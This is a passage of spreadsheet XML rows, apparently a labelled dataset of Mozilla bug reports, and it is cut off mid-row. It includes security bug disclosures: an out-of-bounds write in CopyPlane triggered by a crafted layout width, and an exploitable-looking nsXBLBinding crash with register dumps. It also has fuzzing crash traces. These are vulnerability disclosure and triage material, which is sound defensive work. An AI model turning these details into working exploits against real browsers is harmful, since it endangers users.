      <c r="S832" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T832" t="n">
        <v>1</v>
      </c>
      <c r="U832" t="n">
        <v>0</v>
      </c>
      <c r="V832" t="n">
        <v>22</v>
      </c>
      <c r="W832" t="inlineStr">
        <is>
          <t>In the log in the URL, a test in |make check| timed out, but there's no visible evidence in the log that that happened, so it's not clear at all why the machine is orange. We should get something in the log that we could pick up with the unittest error parser in tinderbox.</t>
        </is>
      </c>
      <c r="X832" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="833">
      <c r="A833" t="n">
        <v>326598</v>
      </c>
      <c r="B833" t="inlineStr">
        <is>
          <t>2006-02-09 16:14:27 -0800</t>
        </is>
      </c>
      <c r="C833" t="inlineStr">
        <is>
          <t>Tree D&amp;D is massively broken</t>
        </is>
      </c>
      <c r="D833" t="inlineStr">
        <is>
          <t>2009-11-26 06:03:49 -0800</t>
        </is>
      </c>
      <c r="E833" t="n">
        <v>1</v>
      </c>
      <c r="F833" t="n">
        <v>1</v>
      </c>
      <c r="G833" t="n">
        <v>2</v>
      </c>
      <c r="H833" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I833" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J833" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K833" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N833" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O833" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P833" t="inlineStr"/>
      <c r="Q833" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R833" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S833" t="inlineStr">
        <is>
          <t>Firefox 2 alpha1</t>
        </is>
      </c>
      <c r="T833" t="n">
        <v>1</v>
      </c>
      <c r="U833" t="n">
        <v>0</v>
      </c>
      <c r="V833" t="n">
        <v>10</v>
      </c>
      <c r="W833" t="inlineStr">
        <is>
          <t>There are about nine million ways to break D&amp;D in tree views.</t>
        </is>
      </c>
      <c r="X833" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="834">
      <c r="A834" t="n">
        <v>1603231</v>
      </c>
      <c r="B834" t="inlineStr">
        <is>
          <t>2019-12-11 13:10:14 -0800</t>
        </is>
      </c>
      <c r="C834" t="inlineStr">
        <is>
          <t>verify_processed cronrun job is broken</t>
        </is>
      </c>
      <c r="D834" t="inlineStr">
        <is>
          <t>2019-12-12 15:01:20 -0800</t>
        </is>
      </c>
      <c r="E834" t="n">
        <v>1</v>
      </c>
      <c r="F834" t="n">
        <v>1</v>
      </c>
      <c r="G834" t="n">
        <v>4</v>
      </c>
      <c r="H834" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I834" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J834" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K834" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L834" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M834" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N834" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O834" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P834" t="inlineStr"/>
      <c r="Q834" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R834" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S834" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T834" t="n">
        <v>1</v>
      </c>
      <c r="U834" t="n">
        <v>0</v>
      </c>
      <c r="V834" t="n">
        <v>5</v>
      </c>
      <c r="W834" t="inlineStr">
        <is>
          <t>When I did the boto -&gt; boto3 rewrite for Socorro, I broke the verify_processed cronrun job. It's failing to run and kicking this error up:
```
&lt;class 'AttributeError'&gt; AttributeError("'S3' object has no attribute 'get_bucket'")
  File "/app/webapp-django/crashstats/cron/management/commands/cronrun.py", line 147, in _run_one
    self._run_job(job_spec, *cmd_args, **cmd_kwargs)
  File "/app/webapp-django/crashstats/cron/management/commands/cronrun.py", line 189, in _run_job
    job_spec["cmd"], *cmd_args, stdout=self.stdout, **cmd_kwargs
  File "/usr/local/lib/python3.7/site-packages/django/core/management/__init__.py", line 148, in call_command
    return command.execute(*args, **defaults)
  File "/usr/local/lib/python3.7/site-packages/django/core/management/base.py", line 364, in execute
    output = self.handle(*args, **options)
  File "/app/webapp-django/crashstats/crashstats/management/commands/verifyprocessed.py", line 178, in handle
    self.check_past_missing()
  File "/app/webapp-django/crashstats/crashstats/management/commands/verifyprocessed.py", line 149, in check_past_missing
    bucket = s3_client.get_bucket(bucket_name)
  File "/usr/local/lib/python3.7/site-packages/botocore/client.py", line 516, in __getattr__
    self.__class__.__name__, item)
```
I think it's this sentry error, but it's really hard to tell since sentry is truncating the message:
https://sentry.prod.mozaws.net/operations/socorro-new-prod/issues/5864397/
This bug covers fixing that.</t>
        </is>
      </c>
      <c r="X834" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="835">
      <c r="A835" t="n">
        <v>1428947</v>
      </c>
      <c r="B835" t="inlineStr">
        <is>
          <t>2018-01-08 18:02:57 -0800</t>
        </is>
      </c>
      <c r="C835" t="inlineStr">
        <is>
          <t>OOB Write in CopyPlane within ImageContainer.cpp</t>
        </is>
      </c>
      <c r="D835" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:40 -0700</t>
        </is>
      </c>
      <c r="E835" t="n">
        <v>1</v>
      </c>
      <c r="F835" t="n">
        <v>1</v>
      </c>
      <c r="G835" t="n">
        <v>3</v>
      </c>
      <c r="H835" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I835" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J835" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K835" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L835" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M835" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N835" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O835" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P835" t="inlineStr">
        <is>
          <t>[original repoter is bzdllx@gmail.com][post-critsmash-triage][adv-main59+][adv-esr52.7+]</t>
        </is>
      </c>
      <c r="Q835" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R835" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S835" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T835" t="n">
        <v>1</v>
      </c>
      <c r="U835" t="n">
        <v>0</v>
      </c>
      <c r="V835" t="n">
        <v>64</v>
      </c>
      <c r="W835" t="inlineStr">
        <is>
          <t>Received a vuln report via email from a friend. I've not confirmed (on paternity leave) but someone should check this. Bug sounds hard to exploit, but reporter want to check with us before blogging about it just in case.
--VIA EMAIL BELOW ------
In the process of creating a full writeup / exploit for the Pwn2Own 2017 bug (https://www.mozilla.org/en-US/security/advisories/mfsa2017-08/) I believe have come across another bug. I am unsure whether the Chaitin team who discovered the Integer Overflow overlooked the vulnerable code, chose to ignore it, reported it alongside their Integer Overflow, or someone else found it subsequently and reported it but I haven't yet found any indication of this being the case.
What's the bug?
The vulnerable function is `CopyPlane` within ImageContainer.cpp (https://searchfox.org/mozilla-central/source/gfx/layers/ImageContainer.cpp#539). The issue here is that the signed 32-bit integer `width` used in the 'Slow Path' of the copy (or when aSkip is anything other than 0) is unchecked. This means that in the case of Firefox 52 a specially crafted Layout can achieve a very simple out of bounds write purely by setting the width value of a layout object to more than the calculated height. (Inside the poc.zip folder I have provided the oobwrite.html file for a simple demonstration of what i mean).
What's the impact?
After a bit of research and scouring through the current Firefox source, I have come to the conclusion that it is _very_ difficult to actually trigger this vulnerable function however it is not impossible. The function `CopyPlane` is referenced only within the `RecyclingPlanarYCbCrImage::CopyData`. The `CopyData` function is then referenced 9 times outside of ImageContainer however, 1 is mitigated by the fact that you removed the overloaded constructor for ImageBitmap objects in Firefox 52. I haven't had a chance to go through and attempt to trigger the bug via the remaining 8 references but i have the suspicion it could be very difficult to trigger from any other code path. For this reason i understand the impact is low but i think it is definitely worth looking at! 
I have actually included this out of bounds write within my writeup but - because I realised the bug may not have been reported / discovered prior to now i thought it would be best to let you know and make sure it got fixed or marked as wont-fix before i go and publish the details publicly.</t>
        </is>
      </c>
      <c r="X835" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="836">
      <c r="A836" t="n">
        <v>643062</v>
      </c>
      <c r="B836" t="inlineStr">
        <is>
          <t>2011-03-18 18:27:25 -0700</t>
        </is>
      </c>
      <c r="C836" t="inlineStr">
        <is>
          <t>Crash in xul!nsXBLBinding::AllowScripts</t>
        </is>
      </c>
      <c r="D836" t="inlineStr">
        <is>
          <t>2011-11-09 01:20:22 -0800</t>
        </is>
      </c>
      <c r="E836" t="n">
        <v>1</v>
      </c>
      <c r="F836" t="n">
        <v>1</v>
      </c>
      <c r="G836" t="n">
        <v>3</v>
      </c>
      <c r="H836" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I836" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J836" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K836" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L836" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M836" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N836" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O836" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P836" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-examined-192][qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q836" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R836" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S836" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T836" t="n">
        <v>1</v>
      </c>
      <c r="U836" t="n">
        <v>0</v>
      </c>
      <c r="V836" t="n">
        <v>22</v>
      </c>
      <c r="W836" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Build Identifier: 
Description:
Following testcase uses a combination of frames, iframes and a xul element. The observed crashes show exploitable behaviour, such as:
32-bit Linux Firefox 3.6.15:
$eax            0x5f5c4c1        99992769
(gdb) x/10i $eip
=&gt; 0xf768436a:  call   *0x128(%eax)
Affected Versions:
Firefox 3.6.15 (Windows and Linux)
Firefox 4 is not affected, as XUL is disabled by default.
Testcase:
The testcase is attached as an HTML file. It will crash the browser on opening after several reloads.
Testcase Notes:
The testcase uses Jesse's quitter extension (https://www.squarefree.com/extensions/quitter.xpi) to reliably trigger garbage collection.
Stack Backtrace:
Following testcases have been observed:
Windows Firefox 3.6.15:
(1718.1944): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!nsXBLBinding::AllowScripts+0x54:
6165e644 8b8024010000    mov     eax,dword ptr [eax+124h] ds:002b:010061e5=????????
xul!nsXBLBinding::AllowScripts(void)+0x54
xul!nsRunnable::Release(void)+0x10
xul!nsRunnableMethod&lt;nsOggDecoder,void&gt;::Run(void)+0xe
xul!nsGenericElement::doReplaceOrInsertBefore(int aReplace = 90637520, class nsIDOMNode * aNewChild = 0x010060c1, class nsIDOMNode * aRefChild = 0x00000001, class nsIContent * aParent = 0x05e1fbc0, class nsIDocument * aDocument = 0x07756870, class nsIDOMNode ** aReturn = 0x07756870)+0x1b5
xul!xpc_qsUnwrapArgImpl(struct JSContext * cx = 0x05e80a80, int v = 298980787, struct nsID * iid = 0x0060c154, void ** ppArg = 0x006578a0, class nsISupports ** ppArgRef = 0x80002e93, int * vp = 0x32dd8a5f)+0x95
xul!nsGenericElement::AppendChild(class nsIDOMNode * aNewChild = 0x05565bd0, class nsIDOMNode ** aReturn = 0x05fe1793)+0x17
xul!nsIDOMNode_AppendChild(struct JSContext * cx = 0x05565bd0, unsigned int argc = 0x5fe1793, int * vp = 0x00200445)+0xf1
js3250!js_FillPropertyCache(struct JSContext * cx = 0x8b04508b, struct JSObject * obj = 0x3b0c244c, unsigned int scopeIndex = 0x8b0e7511, unsigned int protoIndex = 0x413b0840, struct JSObject * pobj = 0xb8067504, struct JSScopeProperty * sprop = 0x00000001, int adding = -1010814013)+0x499
js3250!js_Interpret(struct JSContext * cx = 0x00000000)+0x3270
Ubuntu 64-bit Firefox:
(gdb) bt 30
#0  0x00007ffff6d2fd40 in GetDocument (this=0x7fffda3026c0) at ../../../dist/include/nsNodeInfoManager.h:117
#1  GetDocument (this=0x7fffda3026c0) at ../../../dist/include/nsINodeInfo.h:291
#2  GetOwnerDoc (this=0x7fffda3026c0) at ../../../dist/include/nsINode.h:367
#3  nsXBLBinding::AllowScripts (this=0x7fffda3026c0) at nsXBLBinding.cpp:1394
#4  0x00007ffff6d30c41 in nsXBLBinding::ExecuteAttachedHandler (this=0x7fffda3026c0) at nsXBLBinding.cpp:978
#5  0x00007ffff6d30c32 in nsXBLBinding::ExecuteAttachedHandler (this=0x7fffda302780) at nsXBLBinding.cpp:974
#6  0x00007ffff6d9895d in nsRunnableMethod&lt;nsXBLBinding, void&gt;::Run (this=&lt;value optimized out&gt;) at ../../dist/include/nsThreadUtils.h:282
#7  0x00007ffff6c1a34d in nsContentUtils::RemoveScriptBlocker () at nsContentUtils.cpp:4488
#8  0x00007ffff6c353d2 in nsDocument::EndUpdate (this=0x7fffd917c800, aUpdateType=&lt;value optimized out&gt;) at nsDocument.cpp:3859
#9  0x00007ffff6ce78f9 in nsHTMLDocument::EndUpdate (this=0x7fffe2335e70, aUpdateType=4294954700) at nsHTMLDocument.cpp:3034
#10 0x00007ffff6c4df5f in ~mozAutoDocConditionalContentUpdateBatch (aReplace=&lt;value optimized out&gt;, aNewChild=&lt;value optimized out&gt;, aRefChild=0x0, 
    aParent=0x7fffda344330, aDocument=0x7fffd917c800, aReturn=&lt;value optimized out&gt;) at mozAutoDocUpdate.h:112
#11 nsGenericElement::doReplaceOrInsertBefore (aReplace=&lt;value optimized out&gt;, aNewChild=&lt;value optimized out&gt;, aRefChild=0x0, aParent=0x7fffda344330, 
    aDocument=0x7fffd917c800, aReturn=&lt;value optimized out&gt;) at nsGenericElement.cpp:3956
#12 0x00007ffff69c3e65 in nsIDOMNode_AppendChild (cx=0x7fffe22be800, argc=&lt;value optimized out&gt;, vp=0x7fffda39e108) at dom_quickstubs.cpp:2617
#13 0x00007ffff61df39b in js_Interpret (cx=0x7fffe22be800) at jsops.cpp:2208
#14 0x00007ffff61e6efd in js_Execute (cx=0x7fffe22be800, chain=&lt;value optimized out&gt;, script=&lt;value optimized out&gt;, down=0x0, flags=4159402048, result=0x0)
    at jsinterp.cpp:1601
#15 0x00007ffff6191c19 in JS_EvaluateUCScriptForPrincipals (cx=0x7fffe22be800, obj=0x7fffe4a78e00, principals=&lt;value optimized out&gt;, chars=&lt;value optimized out&gt;, 
    length=&lt;value optimized out&gt;, filename=&lt;value optimized out&gt;, lineno=28, rval=0x0) at jsapi.cpp:5056
#16 0x00007ffff6d64192 in nsJSContext::EvaluateString (this=0x7fffe22b5220, aScript=&lt;value optimized out&gt;, aScopeObject=0x7fffe4a78e00, 
    aPrincipal=&lt;value optimized out&gt;, aURL=&lt;value optimized out&gt;, aLineNo=&lt;value optimized out&gt;, aVersion=0, aRetValue=0x0, aIsUndefined=0x7fffffffd908)
    at nsJSEnvironment.cpp:1764
#17 0x00007ffff6d7e2d5 in nsGlobalWindow::RunTimeout (this=0x7fffd9156800, aTimeout=0x7fffda3c4640) at nsGlobalWindow.cpp:8186
#18 0x00007ffff6d7e644 in nsGlobalWindow::TimerCallback (aTimer=&lt;value optimized out&gt;, aClosure=0x7fffffffcecc) at nsGlobalWindow.cpp:8539
#19 0x00007ffff727bdc5 in nsTimerImpl::Fire (this=0x7fffda3ab290) at nsTimerImpl.cpp:427
#20 0x00007ffff727be8f in nsTimerEvent::Run (this=&lt;value optimized out&gt;) at nsTimerImpl.cpp:519
#21 0x00007ffff72798ef in nsThread::ProcessNextEvent (this=0x7fffed12c9d0, mayWait=0, result=0x7fffffffda0c) at nsThread.cpp:527
#22 0x00007ffff724d2f5 in NS_ProcessNextEvent_P (thread=0x7fffe2335e70, mayWait=-12596) at nsThreadUtils.cpp:250
#23 0x00007ffff71d5730 in mozilla::ipc::MessagePump::Run (this=0x7fffed1ca780, aDelegate=0x7fffed1fa1c0) at MessagePump.cpp:110
#24 0x00007ffff7221c9c in MessageLoop::Run (this=0x7fffed1fa1c0) at ./src/base/message_loop.cc:173
#25 0x00007ffff713621d in nsBaseAppShell::Run (this=0x7fffe79ffd60) at nsBaseAppShell.cpp:174
#26 0x00007ffff7002e7e in nsAppStartup::Run (this=0x7fffe6392d40) at nsAppStartup.cpp:183
#27 0x00007ffff6962207 in XRE_main (argc=&lt;value optimized out&gt;, argv=&lt;value optimized out&gt;, aAppData=&lt;value optimized out&gt;) at nsAppRunner.cpp:3483
#28 0x00007ffff7ff3fa1 in main (argc=1, argv=0x7fffffffe3f8) at nsBrowserApp.cpp:158
VulnDev reference    : vd11004
reported by nils of vulndev ltd
Reproducible: Always</t>
        </is>
      </c>
      <c r="X836" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="837">
      <c r="A837" t="n">
        <v>969309</v>
      </c>
      <c r="B837" t="inlineStr">
        <is>
          <t>2014-02-07 03:11:52 -0800</t>
        </is>
      </c>
      <c r="C837" t="inlineStr">
        <is>
          <t>Assertion failure: masm.currentOffset() - lastOsiPointOffset_ &gt;= Assembler::patchWrite_NearCallSize(), at jit/shared/CodeGenerator-shared.cpp:423</t>
        </is>
      </c>
      <c r="D837" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:42 -0700</t>
        </is>
      </c>
      <c r="E837" t="n">
        <v>1</v>
      </c>
      <c r="F837" t="n">
        <v>1</v>
      </c>
      <c r="G837" t="n">
        <v>3</v>
      </c>
      <c r="H837" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I837" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J837" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K837" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L837" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M837" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N837" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O837" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P837" t="inlineStr">
        <is>
          <t>[jsbugmon:][post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q837" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R837" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S837" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T837" t="n">
        <v>1</v>
      </c>
      <c r="U837" t="n">
        <v>0</v>
      </c>
      <c r="V837" t="n">
        <v>15</v>
      </c>
      <c r="W837" t="inlineStr">
        <is>
          <t>Created attachment 8372183
Testcase for shell
The attached testcase asserts on mozilla-central revision f550b112a19b (x86 ARM simulator build, run with --fuzzing-safe --ion-eager).</t>
        </is>
      </c>
      <c r="X837" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="838">
      <c r="A838" t="n">
        <v>1383951</v>
      </c>
      <c r="B838" t="inlineStr">
        <is>
          <t>2017-07-24 17:29:14 -0700</t>
        </is>
      </c>
      <c r="C838" t="inlineStr">
        <is>
          <t>Out-of-bounds access in js::frontend::TokenStream::TokenBuf::getRawChar</t>
        </is>
      </c>
      <c r="D838" t="inlineStr">
        <is>
          <t>2024-05-30 09:35:33 -0700</t>
        </is>
      </c>
      <c r="E838" t="n">
        <v>1</v>
      </c>
      <c r="F838" t="n">
        <v>1</v>
      </c>
      <c r="G838" t="n">
        <v>3</v>
      </c>
      <c r="H838" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I838" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J838" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K838" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L838" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M838" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N838" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O838" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P838" t="inlineStr">
        <is>
          <t>[adv-main56+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q838" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R838" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S838" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T838" t="n">
        <v>1</v>
      </c>
      <c r="U838" t="n">
        <v>0</v>
      </c>
      <c r="V838" t="n">
        <v>7</v>
      </c>
      <c r="W838" t="inlineStr">
        <is>
          <t>Created attachment 8889686
test.js
Build ASAN JS Shell using funfuzz
https://github.com/MozillaSecurity/funfuzz/tree/master/js
funfuzz/js/compileShell.py -b "--enable-debug --build-with-asan --build-with-clang --enable-more-deterministic -R /build/firefox/src"
ASAN:DEADLYSIGNAL
=================================================================
==145434==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff600448408 (pc 0x0000022e7f6e bp 0x7fffd1a87d70 sp 0x7fffd1a87c20 T0)
    #0 0x22e7f6d in js::frontend::TokenStream::TokenBuf::getRawChar() build/firefox/src/js/src/frontend/TokenStream.h:971:20
    #1 0x22e7f6d in js::frontend::TokenStream::getCharIgnoreEOL() build/firefox/src/js/src/frontend/TokenStream.cpp:532
    #2 0x22e7f6d in js::frontend::TokenStream::putIdentInTokenbuf(char16_t const*) build/firefox/src/js/src/frontend/TokenStream.cpp:1189
    #3 0x22ea1d2 in js::frontend::TokenStream::getTokenInternal(js::frontend::TokenKind*, js::frontend::Token::Modifier) build/firefox/src/js/src/frontend/TokenStream.cpp:1447:18
    #4 0x676aef in js::frontend::TokenStream::peekToken(js::frontend::TokenKind*, js::frontend::Token::Modifier) build/firefox/src/js/src/frontend/TokenStream.h:781:14
    #5 0x674b71 in js::frontend::Parser&lt;js::frontend::FullParseHandler, char16_t&gt;::statementListItem(js::frontend::YieldHandling, bool) build/firefox/src/js/src/frontend/Parser.cpp:7804:14
    #6 0x66eb6e in js::frontend::Parser&lt;js::frontend::FullParseHandler, char16_t&gt;::statementList(js::frontend::YieldHandling) build/firefox/src/js/src/frontend/Parser.cpp:4199:21
    #7 0x664475 in js::frontend::Parser&lt;js::frontend::FullParseHandler, char16_t&gt;::evalBody(js::frontend::EvalSharedContext*) build/firefox/src/js/src/frontend/Parser.cpp:2176:49
    #8 0x19e214a in BytecodeCompiler::compileScript(JS::Handle&lt;JSObject*&gt;, js::frontend::SharedContext*) build/firefox/src/js/src/frontend/BytecodeCompiler.cpp:346:18
    #9 0x19e5347 in BytecodeCompiler::compileEvalScript(JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;js::Scope*&gt;) build/firefox/src/js/src/frontend/BytecodeCompiler.cpp:402:12
    #10 0x19e84b6 in js::frontend::CompileEvalScript(JSContext*, js::LifoAlloc&amp;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;js::Scope*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, js::ScriptSourceObject**) build/firefox/src/js/src/frontend/BytecodeCompiler.cpp:601:12
    #11 0x89e330 in EvalKernel(JSContext*, JS::Handle&lt;JS::Value&gt;, EvalType, js::AbstractFramePtr, JS::Handle&lt;JSObject*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) build/firefox/src/js/src/builtin/Eval.cpp:316:30
    #12 0x89f9a7 in js::DirectEval(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) build/firefox/src/js/src/builtin/Eval.cpp:438:12
    #13 0x7f0f60 in Interpret(JSContext*, js::RunState&amp;) build/firefox/src/js/src/vm/Interpreter.cpp:2979:14
    #14 0x7df993 in js::RunScript(JSContext*, js::RunState&amp;) build/firefox/src/js/src/vm/Interpreter.cpp:410:12
    #15 0x8187bb in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) build/firefox/src/js/src/vm/Interpreter.cpp:699:15
    #16 0x8193b0 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) build/firefox/src/js/src/vm/Interpreter.cpp:731:12
    #17 0x159a796 in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) build/firefox/src/js/src/jsapi.cpp:4637:12
    #18 0x159ac60 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;) build/firefox/src/js/src/jsapi.cpp:4670:12
    #19 0x5b12f7 in RunFile(JSContext*, char const*, _IO_FILE*, bool) build/firefox/src/js/src/shell/js.cpp:608:14
    #20 0x5b12f7 in Process(JSContext*, char const*, bool, FileKind) build/firefox/src/js/src/shell/js.cpp:958
    #21 0x557ad7 in ProcessArgs(JSContext*, js::cli::OptionParser*) build/firefox/src/js/src/shell/js.cpp:7753:14
    #22 0x557ad7 in Shell(JSContext*, js::cli::OptionParser*, char**) build/firefox/src/js/src/shell/js.cpp:8118
    #23 0x557ad7 in main build/firefox/src/js/src/shell/js.cpp:8515
    #24 0x7ff60b236f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #25 0x47ae8c in _start (shell-cache/js-dbg-64-dm-clang-asan-linux-899590a34d56/js-dbg-64-dm-clang-asan-linux-899590a34d56+0x47ae8c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV build/firefox/src/js/src/frontend/TokenStream.h:971:20 in js::frontend::TokenStream::TokenBuf::getRawChar()
==145434==ABORTING</t>
        </is>
      </c>
      <c r="X838" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="839">
      <c r="A839" t="n">
        <v>920092</v>
      </c>
      <c r="B839" t="inlineStr">
        <is>
          <t>2013-09-24 09:09:52 -0700</t>
        </is>
      </c>
      <c r="C839" t="inlineStr">
        <is>
          <t>'[object Object]' is displayed when installing certified app failed on production device</t>
        </is>
      </c>
      <c r="D839" t="inlineStr">
        <is>
          <t>2020-01-21 14:21:09 -0800</t>
        </is>
      </c>
      <c r="E839" t="n">
        <v>1</v>
      </c>
      <c r="F839" t="n">
        <v>1</v>
      </c>
      <c r="G839" t="n">
        <v>6</v>
      </c>
      <c r="H839" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I839" t="inlineStr">
        <is>
          <t>DevTools Graveyard</t>
        </is>
      </c>
      <c r="J839" t="inlineStr">
        <is>
          <t>WebIDE</t>
        </is>
      </c>
      <c r="K839" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L839" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M839" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N839" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O839" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P839" t="inlineStr"/>
      <c r="Q839" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R839" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S839" t="inlineStr">
        <is>
          <t>Firefox 27</t>
        </is>
      </c>
      <c r="T839" t="n">
        <v>1</v>
      </c>
      <c r="U839" t="n">
        <v>0</v>
      </c>
      <c r="V839" t="n">
        <v>11</v>
      </c>
      <c r="W839" t="inlineStr">
        <is>
          <t>When installing an app via the local app page to a device that forbids certified apps, we get an alert dialog with just "[object Object]".</t>
        </is>
      </c>
      <c r="X839" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="840">
      <c r="A840" t="n">
        <v>551233</v>
      </c>
      <c r="B840" t="inlineStr">
        <is>
          <t>2010-03-09 11:49:31 -0800</t>
        </is>
      </c>
      <c r="C840" t="inlineStr">
